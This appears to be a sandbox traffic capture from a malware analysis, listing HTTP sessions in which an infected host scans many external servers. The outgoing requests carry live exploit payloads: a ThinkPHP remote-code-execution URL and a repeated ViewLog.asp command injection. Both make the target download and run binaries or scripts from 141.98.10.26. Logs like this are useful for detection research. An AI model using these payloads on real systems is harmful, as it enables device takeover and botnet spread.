Nov 22, 2023 08:40:16.160701990 CET	17722	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Wed, 22 Nov 2023 07:40:15 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
879	192.168.2.23	38734	88.221.43.243	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:15.862488985 CET	17701	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:16.040137053 CET	17709	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:40:15 GMT Date: Wed, 22 Nov 2023 07:40:15 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 61 37 31 30 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 38 31 35 26 23 34 36 3b 64 34 66 32 34 35 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.97a71002.1700638815.d4f245d</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
880	192.168.2.23	49660	31.136.80.144	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:15.894881964 CET	17703	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:16.479365110 CET	17809	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:17.631170034 CET	17929	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:19.966877937 CET	18119	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:24.574225903 CET	18715	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:33.789047956 CET	19726	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:54.010317087 CET	19774	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
881	192.168.2.23	47126	95.231.201.245	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:15.903525114 CET	17704	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:16.099863052 CET	17711	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 22 Nov 2023 07:40:15 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
882	192.168.2.23	50710	85.214.194.221	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:15.908948898 CET	17705	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:16.107327938 CET	17712	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:16 GMT Server: Apache/2.4.38 (Debian) Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.38 (Debian) Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
883	192.168.2.23	57592	31.129.107.214	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:15.944089890 CET	17707	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:16.182326078 CET	17724	IN	HTTP/1.1 404 Not Found Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io; Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Wed, 22 Nov 2023 07:40:16 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
884	192.168.2.23	51784	94.120.155.22	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:16.167457104 CET	17723	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
885	192.168.2.23	57620	94.120.8.196	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:16.174379110 CET	17724	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
886	192.168.2.23	49210	88.208.197.207	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:16.872739077 CET	17826	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:17.051352024 CET	17828	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:40:16 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
887	192.168.2.23	50060	85.209.161.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:17.605540991 CET	17927	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
888	192.168.2.23	41530	31.136.225.74	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:17.608336926 CET	17927	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:18.175126076 CET	17959	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:19.326960087 CET	18092	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:21.758629084 CET	18429	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:26.365957975 CET	18922	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:35.580735922 CET	19755	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:54.010320902 CET	19775	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
889	192.168.2.23	57200	85.56.192.173	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:17.619429111 CET	17928	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:17.816327095 CET	17934	IN	HTTP/1.0 302 Found Server: httpd Date: Wed, 22 Nov 2023 07:40:21 GMT Location: index.htm Pragma: no-cache Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0 Expires: 0 CONTENT-LANGUAGE: en Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
890	192.168.2.23	46842	95.211.191.2	8080

Timestamp	kBytes transferred	Direction	Data
